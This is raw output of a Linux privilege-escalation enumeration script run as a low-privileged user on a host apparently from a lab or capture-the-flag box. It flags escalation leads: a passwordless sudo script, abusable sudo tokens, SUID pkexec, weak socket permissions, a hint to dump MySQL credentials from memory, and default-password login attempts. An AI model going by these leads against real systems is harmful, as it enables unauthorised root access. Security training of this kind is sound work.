mysql process found (dump creds from memory as root)
postgres Not Found
redis-server Not Found                               
mongod Not Found                                     
memcached Not Found                                  
elasticsearch Not Found                              
jenkins Not Found                                    
tomcat Not Found                                     
nginx Not Found                                      
php-fpm Not Found                                    
supervisord Not Found                                
vncserver Not Found                                  
xrdp Not Found                                       
teamviewer Not Found                                 
                                                     
╔══════════╣ Opened Files by processes
Process 1369 (rin) - /lib/systemd/systemd --user     
  └─ Has open files:
    └─ /proc/1369/mountinfo
    └─ /proc/swaps
    └─ /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service
Process 1515 (rin) - -bash 
  └─ Has open files:
    └─ /dev/pts/1

╔══════════╣ Processes with memory-mapped credential files                                                
                                                     
╔══════════╣ Processes whose PPID belongs to a different user (not root)                                  
╚ You will know if a user can somehow spawn processes as a different user                                 
                                                     
╔══════════╣ Files opened by processes belonging to other users                                           
╚ This is usually empty because of the lack of privileges to read other user processes information        
                                                     
╔══════════╣ Check for vulnerable cron jobs
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs      
══╣ Cron jobs list                                   
/usr/bin/crontab                                     
incrontab Not Found
-rw-r--r-- 1 root root    1042 Oct 11  2019 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x  2 root root 4096 Apr  1  2025 .
drwxr-xr-x 82 root root 4096 Jan 13 04:01 ..
-rw-r--r--  1 root root  712 Mar  9  2025 php
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder                                                    

/etc/cron.daily:
total 36
drwxr-xr-x  2 root root 4096 Apr  1  2025 .
drwxr-xr-x 82 root root 4096 Jan 13 04:01 ..
-rwxr-xr-x  1 root root  539 Jul  1  2024 apache2
-rwxr-xr-x  1 root root 1478 Apr 19  2021 apt-compat
-rwxr-xr-x  1 root root  355 Dec 29  2017 bsdmainutils                                                    
-rwxr-xr-x  1 root root 1187 May 24  2022 dpkg
-rwxr-xr-x  1 root root  377 Aug 28  2018 logrotate
-rwxr-xr-x  1 root root  249 Sep 27  2017 passwd
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder                                                    

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Mar 18  2025 .
drwxr-xr-x 82 root root 4096 Jan 13 04:01 ..
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder                                                    

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Mar 18  2025 .
drwxr-xr-x 82 root root 4096 Jan 13 04:01 ..
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder                                                    

/etc/cron.weekly:
total 12
drwxr-xr-x  2 root root 4096 Mar 18  2025 .
drwxr-xr-x 82 root root 4096 Jan 13 04:01 ..
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder                                                    

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

══╣ Checking for specific cron jobs vulnerabilities
Checking cron directories...                         

╔══════════╣ System timers
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers                  
══╣ Active timers:                                   
NEXT                        LEFT          LAST                        PASSED               UNIT                         ACTIVATES
Tue 2026-01-13 04:39:00 EST 14min left    Tue 2026-01-13 04:09:38 EST 14min ago            phpsessionclean.timer        phpsessionclean.service                
Tue 2026-01-13 06:26:51 EST 2h 2min left  Tue 2025-04-01 10:06:28 EDT 9 months 12 days ago apt-daily.timer              apt-daily.service
Tue 2026-01-13 06:57:44 EST 2h 33min left Tue 2026-01-13 03:23:49 EST 1h 0min ago          apt-daily-upgrade.timer      apt-daily-upgrade.service              
Wed 2026-01-14 00:00:00 EST 19h left      Tue 2026-01-13 03:11:58 EST 1h 12min ago         logrotate.timer              logrotate.service
Wed 2026-01-14 03:27:47 EST 23h left      Tue 2026-01-13 03:27:47 EST 56min ago            systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service         
══╣ Disabled timers:
══╣ Additional timer files:                          
                                                     
╔══════════╣ Services and Service Files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services                
                                                     
══╣ Active services:
apache2.service                    loaded active running The Apache HTTP Server
./linpeas.sh: 3944: local: /usr/sbin/apachectl: bad variable name
 Not Found
                                                     
══╣ Disabled services:
apache-htcacheclean.service            disabled enabled
apache-htcacheclean@.service           disabled enabled
apache2@.service                       disabled enabled
console-getty.service                  disabled disabled
debug-shell.service                    disabled disabled
ifupdown-wait-online.service           disabled enabled
irc_bot.service                        disabled enabled
serial-getty@.service                  disabled enabled
systemd-boot-check-no-failures.service disabled disabled
systemd-network-generator.service      disabled disabled
systemd-networkd-wait-online.service   disabled disabled
systemd-networkd.service               disabled enabled
systemd-resolved.service               disabled enabled
systemd-time-wait-sync.service         disabled disabled
14 unit files listed.

══╣ Additional service files:
./linpeas.sh: 3944: local: /usr/sbin/apachectl: bad variable name
You can't write on systemd PATH

╔══════════╣ Systemd Information
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths                                                
═╣ Systemd version and vulnerabilities? .............. 247.3                                              
═╣ Services running as root? ..... 
═╣ Running services with dangerous capabilities? ... 
═╣ Services with writable paths? . apache2.service: Uses relative path 'start' (from ExecStart=/usr/sbin/apachectl start)                                      
rsyslog.service: Uses relative path '-n' (from ExecStart=/usr/sbin/rsyslogd -n -iNONE)                    

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths                                                
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets                 
./linpeas.sh: 4207: local: /run/systemd/journal/stdout: bad variable name

╔══════════╣ Unix Sockets Analysis
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets                 
/run/dbus/system_bus_socket                          
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/mysqld/mysqld.sock
  └─(Read Write Execute (Weak Permissions: 777) )
/run/systemd/fsck.progress
/run/systemd/inaccessible/sock
/run/systemd/io.system.ManagedOOM
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/systemd/journal/dev-log
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/systemd/journal/stdout
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/systemd/journal/syslog
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/systemd/notify
  └─(Read Write Execute (Weak Permissions: 777) )
  └─(Owned by root)
/run/systemd/private
  └─(Read Write Execute (Weak Permissions: 777) )
  └─(Owned by root)
/run/systemd/userdb/io.systemd.DynamicUser
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/udev/control
/run/user/1000/bus
  └─(Read Write (Weak Permissions: 666) )
/run/user/1000/gnupg/S.dirmngr
  └─(Read Write )
/run/user/1000/gnupg/S.gpg-agent
  └─(Read Write )
/run/user/1000/gnupg/S.gpg-agent.browser
  └─(Read Write )
/run/user/1000/gnupg/S.gpg-agent.extra
  └─(Read Write )
/run/user/1000/gnupg/S.gpg-agent.ssh
  └─(Read Write )
/run/user/1000/pk-debconf-socket
  └─(Read Write (Weak Permissions: 666) )
/run/user/1000/systemd/inaccessible/sock
/run/user/1000/systemd/notify
  └─(Read Write Execute )
/run/user/1000/systemd/private
  └─(Read Write Execute )

╔══════════╣ D-Bus Analysis
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus                   
NAME                            PID PROCESS         USER             CONNECTION    UNIT                        SESSION DESCRIPTION
:1.0                            275 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service   -       -
:1.1                              1 systemd         root             :1.1          init.scope                  -       -
:1.143                        13513 busctl          rin              :1.143        session-6.scope             6       -
:1.2                            324 systemd-logind  root             :1.2          systemd-logind.service      -       -
:1.3                            397 unattended-upgr root             :1.3          unattended-upgrades.service -       -
:1.5                            957 polkitd         root             :1.5          polkit.service              -       -
:1.9                           1369 systemd         rin              :1.9          user@1000.service           -       -
com.ubuntu.SoftwareProperties     - -               -                (activatable) -                           -       -
org.freedesktop.DBus              1 systemd         root             -             init.scope                  -       -
org.freedesktop.PackageKit        - -               -                (activatable) -                           -       -
org.freedesktop.PolicyKit1      957 polkitd         root             :1.5          polkit.service              -       -
org.freedesktop.hostname1         - -               -                (activatable) -                           -       -
org.freedesktop.locale1           - -               -                (activatable) -                           -       -
org.freedesktop.login1          324 systemd-logind  root             :1.2          systemd-logind.service      -       -
org.freedesktop.network1          - -               -                (activatable) -                           -       -
org.freedesktop.resolve1          - -               -                (activatable) -                           -       -
org.freedesktop.systemd1          1 systemd         root             :1.1          init.scope                  -       -
org.freedesktop.timedate1         - -               -                (activatable) -                           -       -
org.freedesktop.timesync1       275 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service   -       -

╔══════════╣ D-Bus Configuration Files
Analyzing /etc/dbus-1/system.d/com.ubuntu.SoftwareProperties.conf:
  └─(Allow rules in default context)
             └─     <allow send_destination="com.ubuntu.SoftwareProperties"
            <allow send_destination="com.ubuntu.SoftwareProperties"
            <allow send_destination="com.ubuntu.DeviceDriver"
Analyzing /etc/dbus-1/system.d/org.freedesktop.PackageKit.conf:
  └─(Allow rules in default context)
             └─     <allow send_destination="org.freedesktop.PackageKit"
            <allow send_destination="org.freedesktop.PackageKit"
            <allow send_destination="org.freedesktop.PackageKit"

══╣ D-Bus Session Bus Analysis
(Access to session bus available)                    
           string "org.freedesktop.DBus"
           string "org.freedesktop.systemd1"
           string ":1.0"
           string ":1.2"
  └─(Known dangerous session service: org.freedesktop.systemd1)                                           
     └─ Try: dbus-send --session --dest=org.freedesktop.systemd1 / [Interface] [Method] [Arguments]

╔══════════╣ Legacy r-commands (rsh/rlogin/rexec) and host-based trust                                    
                                                     
══╣ Listening r-services (TCP 512-514)
                                                     
══╣ systemd units exposing r-services
rlogin|rsh|rexec units Not Found                     
                                                     
══╣ inetd/xinetd configuration for r-services
/etc/inetd.conf Not Found                            
/etc/xinetd.d Not Found                              
                                                     
══╣ Installed r-service server packages
  No related packages found via dpkg                 

══╣ /etc/hosts.equiv and /etc/shosts.equiv
                                                     
══╣ Per-user .rhosts files
.rhosts Not Found                                    
                                                     
══╣ PAM rhosts authentication
/etc/pam.d/rlogin|rsh Not Found                      
                                                     
══╣ SSH HostbasedAuthentication
  HostbasedAuthentication no or not set              

══╣ Potential DNS control indicators (local)
  Not detected                                       

╔══════════╣ Crontab UI (root) misconfiguration checks                                                    
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs      
crontab-ui Not Found                                 
                                                     

                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════                       
                              ╚═════════════════════╝
╔══════════╣ Interfaces
default         0.0.0.0                              
loopback        127.0.0.0
link-local      169.254.0.0

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:99:3b:9e brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.102/24 brd 192.168.0.255 scope global dynamic enp0s3
       valid_lft 5791sec preferred_lft 5791sec
    inet6 fe80::a00:27ff:fe99:3b9e/64 scope link 
       valid_lft forever preferred_lft forever

╔══════════╣ Hostname, hosts and DNS
══╣ Hostname Information                             
System hostname: meltdown                            
FQDN: meltdown

══╣ Hosts File Information
Contents of /etc/hosts:                              
  127.0.0.1     localhost
  127.0.1.1     PyCrt.PyCrt     PyCrt
  ::1     localhost ip6-localhost ip6-loopback
  ff02::1 ip6-allnodes
  ff02::2 ip6-allrouters
  127.0.0.1 meltdown

══╣ DNS Configuration
DNS Servers (resolv.conf):                           
  192.168.1.1
  192.168.0.1
-e 
Systemd-resolved configuration:
  [Resolve]
-e 
DNS Domain Information:
(none)
-e 
DNS Cache Status (systemd-resolve):

╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports              
══╣ Active Ports (ss)                                
tcp     LISTEN   0        80             127.0.0.1:3306          0.0.0.0:*      
tcp     LISTEN   0        128              0.0.0.0:22            0.0.0.0:*      
tcp     LISTEN   0        128                    *:80                  *:*      
tcp     LISTEN   0        128                 [::]:22               [::]:*      

╔══════════╣ Network Traffic Analysis Capabilities
                                                     
══╣ Available Sniffing Tools
No sniffing tools found                              

══╣ Network Interfaces Sniffing Capabilities
Interface enp0s3: Not sniffable                      
No sniffable interfaces found

╔══════════╣ Firewall Rules Analysis
                                                     
══╣ Iptables Rules
No permission to list iptables rules                 

══╣ Nftables Rules
nftables Not Found                                   
                                                     
══╣ Firewalld Rules
firewalld Not Found                                  
                                                     
══╣ UFW Rules
ufw Not Found                                        
                                                     
╔══════════╣ Inetd/Xinetd Services Analysis
                                                     
══╣ Inetd Services
inetd Not Found                                      
                                                     
══╣ Xinetd Services
xinetd Not Found                                     
                                                     
══╣ Running Inetd/Xinetd Services
-e                                                   
Active Services (from ss):
-e 
Running Service Processes:

╔══════════╣ Internet Access?
Neither curl nor wget available                      
DNS accessible
ICMP is accessible
Port 443 is accessible
Port 80 is accessible



                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════                       
                               ╚═══════════════════╝ 
╔══════════╣ My user
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users                   
uid=1000(rin) gid=1000(rin) groups=1000(rin)         

╔══════════╣ PGP Keys and Related Files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys                
GPG:                                                 
GPG is installed, listing keys:
-e 
NetPGP:
netpgpkeys Not Found
-e                                                   
PGP Related Files:
Found: /home/rin/.gnupg
total 16
drwx------ 2 rin rin 4096 Jan 13 04:24 .
drwx------ 3 rin rin 4096 Jan 13 04:24 ..
-rw------- 1 rin rin   32 Jan 13 04:24 pubring.kbx
-rw------- 1 rin rin 1200 Jan 13 04:24 trustdb.gpg

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d                                         
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid           
Matching Defaults entries for rin on meltdown:       
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rin may run the following commands on meltdown:
    (root) NOPASSWD: /opt/repeater.sh


╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens     
ptrace protection is disabled (0), so sudo tokens could be abused

doas.conf Not Found
                                                     
╔══════════╣ Checking Pkexec and Polkit
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2                                    
                                                     
══╣ Polkit Binary
Pkexec binary found at: /usr/bin/pkexec              
Pkexec binary has SUID bit set!
-rwsr-xr-x 1 root root 23448 Jan 13  2022 /usr/bin/pkexec
pkexec version 0.105

══╣ Polkit Policies
Checking /etc/polkit-1/localauthority.conf.d/:       

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo
Checking /usr/share/polkit-1/rules.d/:
polkit.addRule(function(action, subject) {
    if ((action.id == "org.freedesktop.packagekit.upgrade-system" ||
         action.id == "org.freedesktop.packagekit.trigger-offline-update") &&
        subject.active == true && subject.local == true &&
        subject.isInGroup("sudo")) {
            return polkit.Result.YES;
    }
});
// Allow systemd-networkd to set timezone, get product UUID,
// and transient hostname
polkit.addRule(function(action, subject) {
    if ((action.id == "org.freedesktop.hostname1.set-hostname" ||
         action.id == "org.freedesktop.hostname1.get-product-uuid" ||
         action.id == "org.freedesktop.timedate1.set-timezone") &&
        subject.user == "systemd-network") {
        return polkit.Result.YES;
    }
});

══╣ Polkit Authentication Agent
root         957  0.0  0.3 237332  7952 ?        Ssl  03:46   0:00 /usr/libexec/polkitd --no-debug

╔══════════╣ Superusers and UID 0 Users
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html                                                  
                                                     
══╣ Users with UID 0 in /etc/passwd
root:x:0:0:root:/root:/bin/bash                      

══╣ Users with sudo privileges in sudoers
                                                     
╔══════════╣ Users with console
rin:x:1000:1000::/home/rin:/bin/bash                 
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)               
uid=1000(rin) gid=1000(rin) groups=1000(rin)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)                                                    
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)                                            
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)                                                    
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)                                                
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=998(mysql) gid=1001(mysql) groups=1001(mysql)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=9(news) gid=9(news) groups=9(news)

╔══════════╣ Currently Logged in Users
                                                     
══╣ Basic user information
 04:24:39 up  1:12,  1 user,  load average: 0.28, 0.06, 0.22
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
rin      pts/1    192.168.0.106    04:16   23.00s  0.14s  0.00s /bin/sh ./linpeas.sh

══╣ Active sessions
 04:24:39 up  1:12,  1 user,  load average: 0.28, 0.06, 0.22
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
rin      pts/1    192.168.0.106    04:16   23.00s  0.14s  0.00s w

══╣ Logged in users (utmp)
           system boot  2026-01-13 03:11             
           run-level 5  2026-01-13 03:11
LOGIN      tty1         2026-01-13 03:11               350 id=tty1
rin      + pts/1        2026-01-13 04:16   .          1507 (192.168.0.106)

══╣ SSH sessions
ESTAB      0      84               192.168.0.102:22               192.168.0.106:49106                                                                           

══╣ Screen sessions
                                                     
══╣ Tmux sessions
                                                     
╔══════════╣ Last Logons and Login History
                                                     
══╣ Last logins
rin      pts/1        192.168.0.106    Tue Jan 13 04:16   still logged in
rin      pts/1        192.168.0.106    Tue Jan 13 04:03 - 04:16  (00:13)
reboot   system boot  4.19.0-27-amd64  Tue Jan 13 03:11   still running
root     pts/0        192.168.2.118    Tue Dec 30 01:01 - crash (14+02:10)
reboot   system boot  4.19.0-27-amd64  Tue Dec 30 00:59   still running
root     pts/0        192.168.2.118    Mon Dec 29 23:05 - crash  (01:53)
reboot   system boot  4.19.0-27-amd64  Mon Dec 29 23:05   still running
welcome  pts/0        192.168.3.94     Fri Apr 11 22:27 - 22:28  (00:00)
root     pts/0        192.168.3.94     Fri Apr 11 22:27 - 22:27  (00:00)
reboot   system boot  4.19.0-27-amd64  Fri Apr 11 22:26   still running
root     pts/0        192.168.3.94     Fri Apr 11 22:23 - 22:25  (00:01)
reboot   system boot  4.19.0-27-amd64  Fri Apr 11 22:23 - 22:25  (00:02)
root     pts/0        192.168.3.94     Fri Apr 11 22:15 - 22:22  (00:07)
reboot   system boot  4.19.0-27-amd64  Fri Apr 11 22:14 - 22:22  (00:08)
root     pts/0        192.168.3.94     Fri Apr 11 22:08 - 22:13  (00:04)
reboot   system boot  4.19.0-27-amd64  Fri Apr 11 22:07 - 22:13  (00:06)
root     pts/0        192.168.3.94     Fri Apr 11 22:06 - 22:07  (00:00)
reboot   system boot  4.19.0-27-amd64  Fri Apr 11 22:06 - 22:07  (00:01)
root     pts/0        192.168.3.94     Fri Apr 11 22:03 - 22:04  (00:01)
reboot   system boot  4.19.0-27-amd64  Fri Apr 11 22:02 - 22:04  (00:01)

wtmp begins Tue Mar 18 20:40:32 2025

══╣ Failed login attempts
                                                     
══╣ Recent logins from auth.log (limit 20)
                                                     
══╣ Last time logon each user
Username         Port     From             Latest    
root             pts/0    192.168.2.118    Tue Dec 30 01:01:26 -0500 2025
rin              pts/1    192.168.0.106    Tue Jan 13 04:16:22 -0500 2026

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)        
                                                     
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
                                                     


                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════                        
                             ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64                                      
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/ruby
/usr/bin/sudo

╔══════════╣ Installed Compilers
ii  g++                           4:10.2.1-1                                  amd64        GNU C++ compiler
ii  g++-10                        10.2.1-6                                    amd64        GNU C++ compiler
ii  gcc                           4:10.2.1-1                                  amd64        GNU C compiler
ii  gcc-10                        10.2.1-6                                    amd64        GNU C compiler
/usr/bin/gcc

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.62 (Debian)
Server built:   2024-08-15T01:18:37
httpd Not Found
                                                     
Nginx version: nginx Not Found
                                                     
/etc/apache2/mods-enabled/php8.3.conf-<FilesMatch ".+\.ph(?:ar|p|tml)$">
/etc/apache2/mods-enabled/php8.3.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php8.3.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php8.3.conf:    SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-available/php8.3.conf-<FilesMatch ".+\.ph(?:ar|p|tml)$">
/etc/apache2/mods-available/php8.3.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php8.3.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php8.3.conf:    SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Apr  1  2025 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Apr  1  2025 /etc/apache2/sites-enabled                                       
lrwxrwxrwx 1 root root 35 Apr  1  2025 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf                                      
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>


-rw-r--r-- 1 root root 1332 Aug 14  2024 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Apr  1  2025 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf                                      
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

-rw-r--r-- 1 root root 73718 Dec 29 23:08 /etc/php/8.3/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 73714 Mar 13  2025 /etc/php/8.3/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On



╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw-r--r-- 1 root root 1126 Nov 30  2023 /etc/mysql/mariadb.cnf                                           
[client-server]
socket = /run/mysqld/mysqld.sock
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/


╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Apr  4  2025 /etc/pam.d  
-rw-r--r-- 1 root root 2133 Dec 21  2023 /etc/pam.d/sshd                                                  
account    required     pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_keyinit.so force revoke
session    optional     pam_motd.so  motd=/run/motd.dynamic
session    optional     pam_motd.so noupdate
session    optional     pam_mail.so standard noenv # [1]
session    required     pam_limits.so
session    required     pam_env.so # [1]
session    required     pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so open


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural' 
drwxr-xr-x 2 root root 4096 Mar 31  2025 /etc/ldap


╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Mar 18  2025 /usr/share/keyrings                                              




╔══════════╣ Analyzing FTP Files (limit 70)
                                                     


-rw-r--r-- 1 root root 69 Mar 13  2025 /etc/php/8.3/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Mar 13  2025 /usr/share/php8.3-common/common/ftp.ini






╔══════════╣ Analyzing Other Interesting Files (limit 70)                                                 
-rw-r--r-- 1 root root 3526 Apr 18  2019 /etc/skel/.bashrc                                                
-rw-r--r-- 1 rin rin 3526 Apr 18  2019 /home/rin/.bashrc                                                  





-rw-r--r-- 1 root root 807 Apr 18  2019 /etc/skel/.profile                                                
-rw-r--r-- 1 rin rin 807 Apr 18  2019 /home/rin/.profile                                                  




╔══════════╣ Analyzing Windows Files (limit 70)
                                                     





















lrwxrwxrwx 1 root root 22 Mar 31  2025 /etc/alternatives/my.cnf -> /etc/mysql/mariadb.cnf
-rw-r--r-- 1 root root 289 Dec 29 23:13 /etc/my.cnf
lrwxrwxrwx 1 root root 24 Mar 31  2025 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 83 Mar 31  2025 /var/lib/dpkg/alternatives/my.cnf






























╔══════════╣ Searching mysql credentials and exec
Found readable /etc/mysql/my.cnf                     
[client-server]
socket = /run/mysqld/mysqld.sock
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/

╔══════════╣ MySQL version
mysql  Ver 14.14 Distrib 5.7.38, for linux-glibc2.12 (x86_64) using  EditLine wrapper


═╣ MySQL connection using default root/root ........... No                                                
═╣ MySQL connection using root/toor ................... No                                                
═╣ MySQL connection using root/NOPASS ................. No                                                
                                                     
Unable to determine MySQL version.
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg                                         
netpgpkeys Not Found
netpgp Not Found                                     
                                                     
-rw-r--r-- 1 root root 8700 Jun 22  2023 /etc/apt/trusted.gpg.d/debian-archive-bookworm-automatic.gpg
-rw-r--r-- 1 root root 8709 Jun 22  2023 /etc/apt/trusted.gpg.d/debian-archive-bookworm-security-automatic.gpg                                                 
-rw-r--r-- 1 root root 280 Jun 22  2023 /etc/apt/trusted.gpg.d/debian-archive-bookworm-stable.gpg
-rw-r--r-- 1 root root 8700 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-automatic.gpg
-rw-r--r-- 1 root root 8709 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-security-automatic.gpg                                                 
-rw-r--r-- 1 root root 2453 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-stable.gpg
-rw-r--r-- 1 root root 8132 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg                                                   
-rw-r--r-- 1 root root 2332 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 7443 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg                                                  
